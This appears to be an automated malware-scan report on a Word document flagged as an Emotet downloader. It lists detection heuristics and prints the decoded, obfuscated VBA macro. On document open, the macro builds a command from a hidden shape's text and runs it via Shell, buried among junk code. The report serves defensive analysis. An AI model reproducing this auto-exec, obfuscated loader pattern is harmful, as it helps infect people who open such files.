MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6872607-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6872607-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select FizwCN = Array(fZMRBkd, tZzvWjr, KkXQR, [Interaction].Shell(lKbhGbSro, PSZWbpPWaFc), fdnjEGt) Select Case UQwXdLFraBiNWrmjpbsibvro -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6023 bytes |
SHA-256: 4b307751bdaeeb84bda3ba6bf264ba6aa48634ee4ee07710ffd8cdf2cb855ece |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
128 of 167 identifiers look randomly generated (e.g. 'UQwXdLFraBiNWrmjpbsibvro') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jWKEYwOmE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case cRBuhMZQwnQwuwFhVjlA
Case 107945462
bNhdTzHZEcMahtT = 155223412
zDHOkjvzaJLikSlPWpn = 83361385
saJXjomUOMOwEl = ChrB(327660076 / ChrB(59848184))
qhmitpvuUJbLKDfKXGdzrBs = fLzwjfhnGfwGZZw
Case 239942358
cOiKJDJjnjfULzpo = 195813242
hszOocnEiEYlwHsjPnNwWIoN = 296612984
BSvjJSwaQsOOaCXEYEKCiXcb = ChrB(236484674 / ChrB(14649624))
fdZElVpaUJzvGpXqAVA = 85414782
End Select
Select Case dohUGPRGacOKwtG
Case 141517768
EtziDwZLKZKuRBRBz = 339588959
bVzchnwcKUhDXv = 298784711
vRZZqIIvqGMJawJAuCtuE = ChrB(118078005 / ChrB(118637707))
HWPqcVnwXRWjXZOTMElaanBN = hJUBwfdzdSTtSSUT
Case 87320485
JZZcUoaiAjrUUUBfvMSzZl = 297360078
uHuaulQGNBrnlEpfaPfwI = 60183079
wrmXIBPMYjqiNuAoOPkGTdOu = ChrB(286306855 / ChrB(153545002))
WJFwblJwiHOIFzoTGvVbla = 179693590
End Select
Select Case BWjYXoIuQastALVsJpOwV
Case 195439762
KOaXMRRjnEuIlSzXMo = 261141773
oLpdOkWZhdHPXAWJzQw = 188863965
qFoFDkaLRBIiFhzZwIburBKw = ChrB(205167950 / ChrB(244665194))
woavrKYzGBXLzwNPbwhRT = kBIUhHouraSziXrGRX
Case 213926330
sXYzcwiljwwTRYEYnXdRI = 77541942
zsARpXVhJljiMcK = 290614509
cDLtcziFTTSttOahObEcj = ChrB(267644015 / ChrB(91381440))
QohhurvcfuoFAPUtR = 81460282
End Select
Select Case IawdGzPNNRaMlATvPM
Case 203398603
FZUppkjOObNjfphtjAS = 331934804
cnWpLozswsPFARiGJ = 265819449
RAwlEuhwTaMOujKcmw = ChrB(341626206 / ChrB(192189494))
hVSjzbfXwmZMwjNiBRuirfSj = VYpowHJLYkifBHTBZUnm
Case 11713610
zwwkhFwFBDiGcCpiCfQBYwjw = 340542620
bdSLfzbXZsqLaEMT = 227122549
wvfQLqSIVAZCNzlXdVn = ChrB(276367034 / ChrB(160665093))
iEdwsqELoEOIBEiLRbtWb = 181148815
End Select
Select Case dRTRPdiattKInU
Case 315202945
COVjzzLCZOvSzI = 305663429
uChiirncYqHWqbKEaEmXhr = 27680451
GQrBiQalzUOlmQSLbtIH = ChrB(273699605 / ChrB(269691638))
wEqsvVWHDzAYRzlt = QWXWNZRJlbwoizr
Case 113419727
twrYfPcMKnlsBLp = 337906739
rTRplfZiJuaTUA = 63417123
MGpCjkGvJClfQkP = ChrB(42666454 / ChrB(271616126))
GYzPHRSpVVCtqmckpFAwQ = 42759450
End Select
Set jjttSZi = Shapes("pRfhzJGiduUwd").TextFrame
Select Case pmiTNlUvZiNZALWSuKAHHMC
Case 13061260
ijuHlzSBdjlRXU = 196571017
wRwfjaBAZfTQPmcjcPjFa = 258678314
iuYXblAXpWYLvEWXDfuiFj = ChrB(14120224 / ChrB(251460836))
GCoHlYIJcUkHDZPYHdtqahi = rjajEizsmjViLQE
Case 329037605
CSjlPzFfJzDIvQZXi = 102537195
wcEuWsVXDjMrYva = 163216202
uUcjUBvkukqPwLdAz = ChrB(341277615 / ChrB(256870060))
YNtucCwzGiMVrLcNnYdbJJbI = 204168429
End Select
lKbhGbSro = jjttSZi.ContainingRange + biDSCwi + jqZwnb + VYliPN + dNPEQhQV + LoPlkP + FVLZLiL + iWmTd + kPLIoH + cmavqSh + iHEKmdk
Select Case RWlCVaZkLQsFQLaOUG
Case 207982450
ZsoTlmuJlzmMFzc = 296547916
GUuQckiojMurUJ = 91575631
iwZiRRifPwOifAQ = ChrB(228310081 / ChrB(219178115))
OmkowHFfCaARRoYF = DDKmplPAiWEJivLKJub
Case 145743376
ARcmPHiwjZFZaNfWXYAVnSl = 4477543
TfpHHtzjjDlhAailCz = 318782903
kHhjomVbADhfcRvbprYjHprK = ChrB(299833146 / ChrB(268439748))
wVkkUpAlLzJTVXVijV = 40818528
End Select
Select Case PSNHQiDvYPnVIF
Case 262869949
izQbDncsRRSooDJ = 29206015
HXozjXEjYuYmaQEDqrXDdwcp = 138857395
wMPHVGiXAhzHBbLsftDGqA = ChrB(92091128 / ChrB(247413817))
LlATLvwcqYsURYSDCQWDjqvs = QimPzwwdJKUhEpmAiLDSXO
Case 136299411
CojriNVqIhuMLNqZuqHOz = 144912673
bjCFisZOCOBMLOGvwoiZWuap = 110847353
dYjHGnjpIIfIqziTsw = ChrB(68459472 / ChrB(3871718))
KnvKZTwbjJNoKOBhuHOj = 140845901
End Select
Const PSZWbpPWaFc = 0
Select Case cshVMclRkiuujtHUOE
Case 186971842
RmCKfTFLIwWEBwijV = 148219983
ZsPKRmHUtDziTZb = 7395442
pXpsWaJmIptnOXwswDZCbk = ChrB(159507372 / ChrB(154652586))
LIKTCfauotzjNCSFXJwOhifz = UWCwOEwStLSwTFKSsaiBLl
Case 6524921
wDbbIRjcLhhJYwa = 268783445
OTqAGEDmwoEAwajVvBKdXJbi = 272361399
lXAuwzpBzRKGpzXpMdbcNG = ChrB(329442965 / ChrB(265565165))
uPLbErMKTSjlBsELwcSL = 273113457
End Select
Select Case GfzwURwKSFliwfPvFaGhiqwQ
Case 230770342
LoQozQBWDYphBJpuFZwAbpfU = 283416193
UNSQiiPZFItdGVhacq = 38843608
ZzrjlXUiTWIvzbvnEmp = ChrB(46016991 / ChrB(119273315))
DhBbTbSBNoOSwXWifLO = FjzzjiZtVpBwGztJiJEt
Case 105346625
IUjidYRVHislWTiDu = 270970740
ZfXnQLAdMzVGUQ = 261153869
fQBABcAiWGUaabfOPrq = ChrB(252113943 / ChrB(243165323))
QSduEWlXYVisDmtpAwfp = 114381258
End Select
FizwCN = Array(fZMRBkd, tZzvWjr, KkXQR, [Interaction].Shell(lKbhGbSro, PSZWbpPWaFc), fdnjEGt)
Select Case UQwXdLFraBiNWrmjpbsibvro
Case 150309822
DXJsavOEbjrHiDSuBiiKFq = 325633650
GzBYXYZKBoIihhaiz = 120080410
FphwpMjuMJMjNZrmd = ChrB(308214209 / ChrB(271576289))
CHhGqvkMTEvKnZrdZALM = iNAoFuIquzoJlOwHaGubUaI
Case 92578796
wniNNcjcpXtjSl = 1018641
WYHHABLsVwuRlWEFmmI = 50917588
chUEhvqEaIVuzzBAGAu = ChrB(180407467 / ChrB(270940190))
PiSrTToufcsBurmCTFVoupY = 150288247
End Select
Select Case AjmNpFZoJozLawLmdALU
Case 188784894
OGGTlYGfSQBIwuFX = 265218997
UNZGwbpwimNNJKBnUf = 43049497
UAhdVhJRAQhGMrzOnH = ChrB(70437324 / ChrB(202167107))
pqURFHrGJaZQRATjvlOS = wSEHBSLnzNVbsiKNLQa
Case 121335806
rqHpuqfirWvMFtYP = 70589910
ofTJMEoZVJSkUo = 341911421
FbzRGbfEHrZPmlmz = ChrB(6787375 / ChrB(82499081))
mqhiCBUUWQHBHMrowStzM = 3522519
End Select
Select Case MfUmVsqcEYakmsbr
Case 237620261
EfSjipitkNnEMGcjNiaTY = 162338398
mpqlfXhZYtuusvdAfEcIcoz = 77462566
HCiwQQKjljtoEDVDnP = ChrB(73153937 / ChrB(122071429))
kokdvPvQRwpiQXUC = HcjOGPjMaBGFoYotJXOu
Case 125969357
BPPUiDKnfBALHijwdY = 1872205
UNoLcZAlHAFHJmaUw = 253253867
jCnVFEdRGKMtquBBnaErI = ChrB(18263467 / ChrB(165162670))
ivtBVIOzrrUPjsjGwIua = 308435471
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.